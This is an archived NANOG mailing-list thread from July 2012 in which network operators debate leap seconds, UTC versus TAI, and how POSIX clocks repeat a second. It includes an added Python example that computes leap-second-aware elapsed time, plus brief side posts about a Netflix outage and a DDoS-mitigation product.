For a blow-by-blow review of the international bureaucratic regulatory situation for leap seconds see
http://www.ucolick.org/~sla/leapsecs/onlinebib.html

For a worked example that could alleviate the disagreement between POSIX and leap seconds, and which might break the international stalemate
http://www.ucolick.org/~sla/leapsecs/right+gps.html

In there are also links to those 400 pages of the book, but I suggest that this forum is not the best place to rehash this information.

--
Steve Allen                                                  WGS-84 (GPS)
UCO/Lick Observatory--ISB   Natural Sciences II, Room 165   Lat +36.99855
1156 High Street            Voice: +1 831 459 3046          Lng -122.06015
Santa Cruz, CA 95064        http://www.ucolick.org/~sla/    Hgt +250 m

From cmadams at hiwaay.net Tue Jul 3 19:26:48 2012
From: cmadams at hiwaay.net (Chris Adams)
Date: Tue, 3 Jul 2012 19:26:48 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
References: <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
Message-ID: <20120704002648.GA3263@hiwaay.net>

Once upon a time, Owen DeLong said:
> UTC (and the system clock) should not move backwards, but, rather they repeat
> second 59. UTC goes 58->59->00 most of the time, but during a leap second, it
> should go 58->59->59->00. It's not so much going backwards as dropping a chime.

That would be true if the highest resolution clock was one second, but that's not the case. Anything that uses gettimeofday() sees time repeat (which means it counts up to 59.999999 seconds and then goes back to 59.000000).

--
Chris Adams
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.

From randy at psg.com Tue Jul 3 19:32:17 2012
From: randy at psg.com (Randy Bush)
Date: Wed, 04 Jul 2012 09:32:17 +0900
Subject: FYI Netflix is down
In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net>
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc>
Message-ID:

> Also, I don't think there is an acceptable level of downtime for
> water.
coming soon to a planet near you

randy

From owen at delong.com Tue Jul 3 19:34:37 2012
From: owen at delong.com (Owen DeLong)
Date: Tue, 3 Jul 2012 17:34:37 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu>
References: <49423.1341348864@turing-police.cc.vt.edu>
Message-ID: <63E2BC70-FED8-4736-89D4-ECD1691CAEFA@delong.com>

On Jul 3, 2012, at 1:54 PM, Valdis.Kletnieks at vt.edu wrote:

> On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said:
>
>> Leapseconds can be both positive and negative, but up to now, the
>> earth has only slowed down, so we have added seconds.
>
> That's what many people believe, but it's not exactly right. Leap seconds
> are added for the exact same reason leap days are - the earth's rotation
> isn't a clean multiple of the year. We know we need to stick in an entire
> leap day every 4 years or so, then add the 400 hack to get it closer. At
> that point, it's *really* close, to the point where just shimming in a second
> every once in a while is enough to get it back in sync.
>

IIRC, isn't it:

Add a leap day every 4 years.
Exception: If the year ends in 00, do not add a leap day. (an exception seemingly glossed over in the thread so far)
Exception to the exception: If the year is a multiple of 400, add a leap day. (so called 400 hack)

With that set of rules, we get close enough to only fudge by a second here and there.

Owen

From randy.fischer at gmail.com Tue Jul 3 20:06:21 2012
From: randy.fischer at gmail.com (Randy Fischer)
Date: Tue, 3 Jul 2012 21:06:21 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com>
Message-ID:

On Tue, Jul 3, 2012 at 5:24 PM, Tony Finch wrote:

> Leap seconds are to align the artificial and very stable atomic timescale
> with the irregular and slowing rotation of the earth.
>

What do you want to use for a clock? It is convenient (if provincial) for me to use the sky as the ultimate clock. Thus these adjustments.

From avg at kotovnik.com Tue Jul 3 20:13:15 2012
From: avg at kotovnik.com (Vadim Antonov)
Date: Tue, 03 Jul 2012 18:13:15 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <4FF37A05.7040305@kotovnik.com>
Message-ID: <4FF398AB.2070601@kotovnik.com>

On 7/3/2012 4:15 PM, Tony Finch wrote:
> Vadim Antonov wrote:
>>
>> But in theory, if you can get the technical wrinkles worked out, you can
>> derive the same frequency standard in your lab with a single instrument.
>>
>> (One more issue is that non-relativistic time is not only the frequency of
>> oscillators, but also a reference point).
>
> Your parenthetical point explains why TAI does not tick at the same rate
> as the SI second in your lab, especially if your lab is (for example) in
> Colorado. You have to adjust the frequency depending on your difference in
> gravitational potential from the geoid.
>
> Tony.
>

I'm afraid I didn't express my thoughts clearly... I mean besides agreement of what a second is there is also an agreement on when the zeroth second was, a fixed reference point in time. *That* cannot be recreated in a lab.
(You can correct for relativistic effects of local gravity and moving frame of reference, though, to match conditions on the Earth and thus the SI definition of second).

However, the whole concept of universal standard of _time_ (as opposed to standard of second) is thoroughly non-relativistic because it claims to have clocks at different locations ticking simultaneously. The special relativity, of course, makes it clear that simultaneity is in the eye of the observer:) In the end, you can only do limited Einstein-Poincare synchronization within a chosen reference frame.

An interesting factoid: the notion of synchronized time differs if you synchronize clocks from East-to-West and from West-to-East, due to Sagnac effect:)

--vadim

PS. I would vote for using TAI instead of UTC as the non-relativistic time base in computer systems. The idea of expressing UTC as a single number (instead of tuple) is silly because it creates aliases or gaps. You cannot do simple interval arithmetic over UTC, no more than you can do that over local daylight savings time; and doing accurate time computation for events in the future is impossible in both because they depend on unpredictable factors (Earth rotation rate, politics, etc). TAI is also not a fixed given, because the standards are being refined, but at least the refinements tend to be predictably in the direction of improved accuracy, so they don't break things.

From sla at ucolick.org Tue Jul 3 20:28:13 2012
From: sla at ucolick.org (Steve Allen)
Date: Tue, 3 Jul 2012 18:28:13 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF398AB.2070601@kotovnik.com>
References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com>
Message-ID: <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org>

On 2012 Jul 3, at 18:13, Vadim Antonov wrote:
> PS. I would vote for using TAI instead of UTC as the
> non-relativistic time base in computer systems.
A problem with the use of TAI is that the BIPM and CCTF (who make TAI) expressed strongly that they do not want it used as a system time in document CCTF09-27
http://www.bipm.org/cc/CCTF/Allowed/18/CCTF_09-27_note_on_UTC-ITU-R.pdf
so strongly that they end by contemplating the discontinuation of TAI.

Unless there is international agreement that a time scale should be used, and support of the agency making that time scale, there will be trouble. The only way out of those constraints is to have the wherewithal of the US DoD or the Chinese government who simply asserted that the GPS system time and Beidou system time would be something other than those international standards.

--
Steve Allen                  WGS-84 (GPS)
UCO/Lick Observatory         Natural Sciences II, Room 165    Lat +36.99855
University of California     Voice: +1 831 459 3046           Lng -122.06015
Santa Cruz, CA 95064         http://www.ucolick.org/~sla/     Hgt +250 m

From avg at kotovnik.com Tue Jul 3 20:55:29 2012
From: avg at kotovnik.com (Vadim Antonov)
Date: Tue, 03 Jul 2012 18:55:29 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org>
References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org>
Message-ID: <4FF3A291.6040900@kotovnik.com>

On 7/3/2012 6:28 PM, Steve Allen wrote:
> On 2012 Jul 3, at 18:13, Vadim Antonov wrote:
>> PS. I would vote for using TAI instead of UTC as the
>> non-relativistic time base in computer systems.
>
> A problem with the use of TAI is that the BIPM and CCTF (who make
> TAI) expressed strongly that they do not want it used as a system
> time in document CCTF09-27
> http://www.bipm.org/cc/CCTF/Allowed/18/CCTF_09-27_note_on_UTC-ITU-R.pdf
> so strongly that they end by contemplating the discontinuation
> of TAI.

There's always a possibility of using pseudo-TAI internally by reconstructing it from UTC.
This is not the best solution (because it requires systems to have long-term memory of past leap seconds, or ability to access a reliable storage of such), but at least this removes the burden of doing complicated time handling from application software.

Actually, what they are saying is that they would discontinue TAI *if* definition of UTC is amended to remove future leap seconds. The document makes it clear that they recognize the necessity of continuous coordinate time standard.

--vadim

From morrowc.lists at gmail.com Tue Jul 3 21:11:16 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Tue, 3 Jul 2012 22:11:16 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF3A291.6040900@kotovnik.com>
References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> <4FF3A291.6040900@kotovnik.com>
Message-ID:

came for the meme, stayed for the epic rant on time. thanks for making my holiday start awesome.

-chris

From mysidia at gmail.com Tue Jul 3 21:33:14 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Tue, 3 Jul 2012 21:33:14 -0500
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF3A291.6040900@kotovnik.com>
References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> <4FF3A291.6040900@kotovnik.com>
Message-ID:

On 7/3/12, Vadim Antonov wrote:
> There's always a possibility of using pseudo-TAI internally by
> reconstructing it from UTC. This is not the best solution (because it
> requires systems to have long-term memory of past leap seconds, or

How about, instead of requiring systems to "remember" past leap seconds; You represent every single timestamp instead of as

timestamp = <32-bit int, seconds since jan 1 1970 00:00:00>

You represent all system timestamps as tuples:

timestamp = ( <32-bit int seconds since jan 1 1970 00:00:00>, )

No need to retain a history.
Just retain the data in the same way that Hours, Minutes, and Second are retained.

Comparison is simple. (Timestamp2 - Offset2) - (Timestamp1 - Offset1)

The downside is you can no longer set your system clock by hand, because humans won't know the right number of "leap seconds" to supply when setting the time from their wall clock. That's a problem necessitating you keep a history anyways.

For time to be universally coordinated, it has to be coordinated. One of the basic requirements for system time is that it interacts with humans, and humans have to be able to set their clock from conventional time sources which are based on local time, without the machine having to be constantly updated or reach out on a network and figure out how that translates into a reasonable machine time.

--
-JH

From jra at baylink.com Tue Jul 3 21:47:02 2012
From: jra at baylink.com (Jay Ashworth)
Date: Tue, 03 Jul 2012 22:47:02 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
Message-ID:

No, it really shouldn't.
--
Sent from my Android phone with K-9 Mail. Please excuse my brevity.

Owen DeLong wrote:

On Jul 3, 2012, at 1:09 PM, Saku Ytti wrote:

> On (2012-07-03 12:46 -0700), Owen DeLong wrote:
>
>> If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write.
>
> If only all software could be ordered from you Owen, but in practice this
> is not possible. Some code will be written by less intelligent people. And
> reviewing any code doing foo = timestamp+offset and if now > foo, virtually
> never expects time to move backwards.

Sure, but even with that, 99% of it has only a passing 'interesting' effect and then recovers.

> UTC doesn't move backwards (it goes 59 -> 60 -> 00). TAI does not move
> backwards. Unixtime moves backwards, like Spanish inquisition no one
> expects that.

UTC (and the system clock) should not move backwards, but, rather they repeat second 59. UTC goes 58->59->00 most of the time, but during a leap second, it should go 58->59->59->00. It's not so much going backwards as dropping a chime.

>> It is well known that leap seconds exist.
>
> Quite. But it is not well known that unixtime travels backwards.
>

In part because it shouldn't actually do so. It should simply chime 59 twice.

Owen

From george.herbert at gmail.com Tue Jul 3 22:15:42 2012
From: george.herbert at gmail.com (George Herbert)
Date: Tue, 3 Jul 2012 20:15:42 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>
Message-ID:

On Tue, Jul 3, 2012 at 4:48 PM, Owen DeLong wrote:
>....
> Most people operate on the assumption that there are 86400*365.25 seconds per year overall and that every day is 86,400 seconds. UTC matches that common conception of time. UT1 does not because UT1 monotonically increments one second for every elapsed second of time and continues to drift out of synchronization with the celestial phenomena on which the common conception of time is based.

Let's be clear - the "celestial phenomena" vary regularly.
The Sun and Moon do not rise and set at the same exact time every day; people would not practically notice a second-a-year skew in this for decades or longer, much less societally have grounds to object to it. And it's only historically been about 0.625 s / yr averaged since 1972. At that long term rate (if that's what it ended up being) it would be about a minute a century, or 6000 years before we saw things happening a whole hour off from "expected solar time", which to be frank stops being meaningful around when you have real clocks and astronomy.

The only people for which the celestial phenomena timing matters this precisely are astronomers, who ALREADY have to do their own things to keep everything straight, much more precisely than the leap seconds correct the ongoing skews.

This (irregular leap seconds) is a solution which is monumentally badly matched to the actual problem set.

>> NTP can keep time in UTC (or anything else) if it wants, but it should discipline the system clock to monotonically increasing UT1.
>
> This will break many many currently correct applications and is not a change that should be undertaken lightly. Especially not if it is intended to fix a moderately esoteric bug in a few things that crops up once per decade or so.

I would argue exactly the opposite. It's unpredictable and irregular enough that a nearly completely new set of software and administrators are what encounters it each time it comes through. It broke chunks of the internet this time. Last time, this was a "Oh, well, some geeks inconvenienced, shrug". This time it was fortunately small enough (esp. in comparison to the recent AWS outage due to more malign natural forces) that it wasn't a big deal. It could be more disruptive next time.

From an Internet Stability point of view, one can easily take the position that This Just Does Not Do.
So - It's there to keep us in sync with the stars, except it's done in increments nobody will notice but astronomers, who have to do better than that anyways; it disrupts technology, to a mild to moderate degree. Why are we doing it again?

I like this atomic time thing. It's sounding better and better each day we keep arguing about it. If it bothers you that much we can schedule in a leap hour for Y8000 (or, Y5000, Y11000, Y17000, ....).

It's not a butthead thing to do to assert that the Internet's stability in this matter now outweighs an arbitrary and abstract argument among timekeepers. We matter more than they do, now. If they want to keep a more true Solar Time they can do so; we can run on atomic and put this silly notion of trying to say Sun-centric behind us. This is the 21st century.

Leapsecondo Delenda Est!

--
-george william herbert
george.herbert at gmail.com

From tyler.haske at gmail.com Tue Jul 3 22:33:35 2012
From: tyler.haske at gmail.com (Tyler Haske)
Date: Tue, 3 Jul 2012 23:33:35 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>
Message-ID:

On Tue, Jul 3, 2012 at 11:15 PM, George Herbert wrote:
>
> It's not a butthead thing to do to assert that the Internet's
> stability in this matter now outweighs an arbitrary and abstract
> argument among timekeepers. We matter more than they do, now. If
> they want to keep a more true Solar Time they can do so; we can run on
> atomic and put this silly notion of trying to say Sun-centric behind
> us. This is the 21st century.
>
> Leapsecondo Delenda Est!

I don't see why everyday computers, servers, and routers need the functionality to add (or subtract) an arbitrary second once every 3 or 4 years. These things are supposed to be synced to a NTP source anyway.
Easiest solution is just remove leap second functionality from mainline code, and make it something you have to special-compile for.

The fact there is a 400 page book on the subject really makes me wonder how well the average kernel hacker is doing the implementation. (Oh wait, we saw EXACTLY how well it was done).

All this is a time bomb (lame I know) waiting to go off every few years there is a leap second. We get to find out which servers are running which out-of-date kernels that attempt to implement some arcane time function practically no one cares about.

(Sorry time aficionados. I appreciate your work, but I'd rather just look it up and not trust my computer to calculate it.)

From msa at latt.net Tue Jul 3 22:59:32 2012
From: msa at latt.net (Majdi S. Abbas)
Date: Tue, 3 Jul 2012 23:59:32 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>
Message-ID: <20120704035932.GA20652@puck.nether.net>

On Tue, Jul 03, 2012 at 11:33:35PM -0400, Tyler Haske wrote:
> 4 years. These things are supposed to be synced to a NTP source
> anyway.
>
> Easiest solution is just remove leap second functionality from
> mainline code, and make it something you have to special-compile for.

Please reconcile these two statements.

Thanks,

--msa

From tyler.haske at gmail.com Tue Jul 3 23:02:57 2012
From: tyler.haske at gmail.com (Tyler Haske)
Date: Wed, 4 Jul 2012 00:02:57 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120704035932.GA20652@puck.nether.net>
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net>
Message-ID:

On Tue, Jul 3, 2012 at 11:59 PM, Majdi S. Abbas wrote:
> On Tue, Jul 03, 2012 at 11:33:35PM -0400, Tyler Haske wrote:
>> 4 years. These things are supposed to be synced to a NTP source
>> anyway.
>>
>> Easiest solution is just remove leap second functionality from
>> mainline code, and make it something you have to special-compile for.
>
> Please reconcile these two statements.
>
> Thanks,
>
> --msa

Someone running an NTP Server connected to a cesium clock could run the leap-second time code. Since it's *their job* to have the correct time, they can do all the fancy rarely used things that make parts of the Internet die every couple of years.

From msa at latt.net Tue Jul 3 23:19:49 2012
From: msa at latt.net (Majdi S. Abbas)
Date: Wed, 4 Jul 2012 00:19:49 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
References: <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
Message-ID: <20120704041949.GB20652@puck.nether.net>

On Tue, Jul 03, 2012 at 04:53:32PM -0700, Owen DeLong wrote:
> UTC (and the system clock) should not move backwards, but, rather they repeat
> second 59. UTC goes 58->59->00 most of the time, but during a leap second, it
> should go 58->59->59->00. It's not so much going backwards as dropping a
> chime.

Owen,

...that is going backwards, since we'll repeat 59.XXXXXX. Which is really bad for a lot of applications, system timers, pretty much any database, sleep mechanisms, locking mechanisms, etc.

What happens if you were trying to execute some code at 59.5926725? Has it already happened or is it yet to come? Looking back at two financial transactions, which came first?

I've had an environment where large reverse steps occurred with some regularity -- you don't want to go there. At all.
There is a LOT more software that wigs out when you reverse step the clock (which you will be, if you 'repeat' a second.) than does when a leap occurs.

> In part because it shouldn't actually do so. It should simply chime 59 twice.

You must have written some NMEA code in a past life.

I'd be fine with rolling TAI for systems use, but it does not make much sense to condemn the leap second in UTC for this. We've had a fair number of them, in the Internet age, without this much trouble.

This is about bad software development. If you change something like the leap second handler in your code, please test it. If not right away, before 2 more leap seconds have occurred several years down the road.

Also, people that build production environments on operating systems that do not receive that sort of testing, do so at their own risk. That's their fault, despite any fist shaking/angry tweeting at 23:59:60.

It's pathetic that advertising clocks in public places can get this right (and did in 2008) and 'the Internet' cannot:

http://www.youtube.com/watch?v=PJ4TWChcKpI

--msa

From paul at paulgraydon.co.uk Tue Jul 3 23:29:01 2012
From: paul at paulgraydon.co.uk (Paul Graydon)
Date: Tue, 03 Jul 2012 18:29:01 -1000
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
Message-ID: <4FF3C68D.4070200@paulgraydon.co.uk>

On 7/3/2012 1:53 PM, Owen DeLong wrote:
>
> UTC (and the system clock) should not move backwards, but, rather they repeat
> second 59.
> UTC goes 58->59->00 most of the time, but during a leap second, it
> should go 58->59->59->00. It's not so much going backwards as dropping a chime.
>

If they do that, they're "doing it wrong", UTC and the system clock should go 58->59->60->00.

From the IERS bulletin announcing the leap second just past:
http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat

"A positive leap second will be introduced at the end of June 2012. The sequence of dates of the UTC second markers will be:

2012 June 30, 23h 59m 59s
2012 June 30, 23h 59m 60s
2012 July 1, 0h 0m 0s"

From sla at ucolick.org Tue Jul 3 23:41:09 2012
From: sla at ucolick.org (Steve Allen)
Date: Tue, 3 Jul 2012 21:41:09 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF3C68D.4070200@paulgraydon.co.uk>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> <4FF3C68D.4070200@paulgraydon.co.uk>
Message-ID: <2A643BE4-04A3-480B-ACCE-788B01ABC8AB@ucolick.org>

On 2012 Jul 3, at 21:29, Paul Graydon wrote:
> http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat

Which is simply reiterating an older version of the regulatory document that specifies how UTC shall be done
http://www.itu.int/rec/R-REC-TF.460/en

On paper it is a scheme that will work for 1000 years, but the original regulation contained no implementation details, no interoperability studies, no agency responsible for describing how implementations might communicate requirements, and that paper was locked behind a paywall for the first 40 years of its existence. All of that is too late to fix now.
The events in January showed that the notion of simply abandoning leap seconds could not achieve consensus required for change. We are in Disney's Haunted Mansion with the spirit taunting us to find a way out.

--
Steve Allen                  WGS-84 (GPS)
UCO/Lick Observatory         Natural Sciences II, Room 165    Lat +36.99855
University of California     Voice: +1 831 459 3046           Lng -122.06015
Santa Cruz, CA 95064         http://www.ucolick.org/~sla/     Hgt +250 m

From saku at ytti.fi Wed Jul 4 01:27:22 2012
From: saku at ytti.fi (Saku Ytti)
Date: Wed, 4 Jul 2012 09:27:22 +0300
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
References: <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>
Message-ID: <20120704062722.GA16614@pob.ytti.fi>

On (2012-07-03 16:53 -0700), Owen DeLong wrote:

> Sure, but even with that, 99% of it has only a passing 'interesting' effect and
> then recovers.

Inclusive you no longer know order of events based on your logs, and virtually none of your software is logging 60th second. What are only interesting and what can cause with luck (or bad luck) catastrophic failures is guess work, no one is going to review all the code written, and almost all of it assumes monotonic time.

> > Quite. But it is not well known that unixtime travels backwards.
> In part because it shouldn't actually do so. It should simply chime 59 twice.

Chiming 59 twice is traveling backwards. It goes to what ever precision you have between 59 and 00, then it goes back to 59 flat.
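An added example (mine, not code from any poster in this thread) that puts Chris Adams's gettimeofday() observation, Vadim's pseudo-TAI reconstruction and Saku's point about log ordering into running code. The leap-second table is an excerpt of the published IERS values; the (posix, in_leap) pair is an assumed representation, because a bare POSIX value cannot say which of the two 23:59:59 seconds it came from.

```python
"""Leap-second-aware elapsed time and ordering for POSIX timestamps.

Added example, not from any poster in the thread.  A POSIX clock that
inserts the 2012-06-30 leap second hands out 1341100799.x twice (the
"59 -> 59" chime), so POSIX arithmetic alone loses one second and
cannot order events across the leap.  Reconstructing a pseudo-TAI count
from POSIX time plus a leap-second table restores both, provided the
timestamp also records whether it was read during the replayed second.
"""

# (POSIX value at which TAI-UTC takes its new value, TAI-UTC in seconds).
# Excerpt of the IERS table (positive leaps only); a real deployment loads
# the full list from a maintained source.
LEAP_TABLE = [
    (915148800, 32),    # 1999-01-01 00:00:00 UTC
    (1136073600, 33),   # 2006-01-01
    (1230768000, 34),   # 2009-01-01
    (1341100800, 35),   # 2012-07-01, the leap discussed in the thread
]


def tai_minus_utc(posix):
    """TAI-UTC in effect at a POSIX instant; raises before the table starts."""
    offset = None
    for boundary, value in LEAP_TABLE:
        if posix >= boundary:
            offset = value
    if offset is None:
        raise ValueError("instant precedes the leap table excerpt")
    return offset


def to_pseudo_tai(posix, in_leap=False):
    """Continuous seconds since the epoch: POSIX value plus TAI-UTC.

    in_leap=True marks a reading taken while the kernel was replaying
    23:59:59 (really UTC 23:59:60.x); it restores the second POSIX dropped.
    The flag is only meaningful in the last second before a table boundary.
    """
    if in_leap and all(int(posix) + 1 != b for b, _ in LEAP_TABLE):
        raise ValueError("in_leap set outside the second before a leap")
    return posix + tai_minus_utc(posix) + (1 if in_leap else 0)


def elapsed(first, second):
    """True seconds from first to second; each is a (posix, in_leap) pair."""
    return to_pseudo_tai(*second) - to_pseudo_tai(*first)


def naive_elapsed(first, second):
    """What 'now - then' on raw POSIX values reports across the leap."""
    return second[0] - first[0]


def backward_steps(samples):
    """Indices where successive gettimeofday()-style readings ran backwards.

    This is the 59.999999 -> 59.000000 replay Chris Adams describes; a
    monitor that sees it knows POSIX-ordered logs from that second are
    unreliable.
    """
    return [i for i in range(1, len(samples)) if samples[i] < samples[i - 1]]


# Constructed events around 2012-06-30 23:59:60 UTC (not real log data).
BEFORE_LEAP = (1341100799.5, False)   # 23:59:59.5 UTC
DURING_LEAP = (1341100799.5, True)    # 23:59:60.5 UTC, same POSIX value replayed
AFTER_LEAP = (1341100800.5, False)    # 00:00:00.5 UTC on 2012-07-01

# Constructed clock readings taken across the replayed second.
READINGS = [1341100799.25, 1341100799.75, 1341100799.999999,
            1341100799.0, 1341100799.5, 1341100800.0]


if __name__ == "__main__":
    print("naive POSIX elapsed before->after:", naive_elapsed(BEFORE_LEAP, AFTER_LEAP))  # 1.0
    print("true elapsed before->after:", elapsed(BEFORE_LEAP, AFTER_LEAP))               # 2.0
    print("POSIX cannot tell before from during:", BEFORE_LEAP[0] == DURING_LEAP[0])     # True
    print("pseudo-TAI orders them, elapsed:", elapsed(BEFORE_LEAP, DURING_LEAP))          # 1.0
    print("clock ran backwards at reading index:", backward_steps(READINGS))             # [3]
```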
--
++ytti

From waseem_aliraqi at yahoo.com Wed Jul 4 02:13:30 2012
From: waseem_aliraqi at yahoo.com (Waseem)
Date: Wed, 4 Jul 2012 00:13:30 -0700 (PDT)
Subject: Arbor network
Message-ID: <1341386010.66568.YahooMailNeo@web160406.mail.bf1.yahoo.com>

Hi,

Anybody using Arbor Peakflow? Can tell us about its efficiency? Any other DDoS detection and mitigation product?

Regards,
Waseem

From rs at seastrom.com Wed Jul 4 08:48:30 2012
From: rs at seastrom.com (Robert E. Seastrom)
Date: Wed, 04 Jul 2012 09:48:30 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: (Tyler Haske's message of "Wed, 4 Jul 2012 00:02:57 -0400")
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net>
Message-ID: <86vci31vtd.fsf@seastrom.com>

Tyler Haske writes:

> Someone running an NTP Server connected to a cesium clock could run
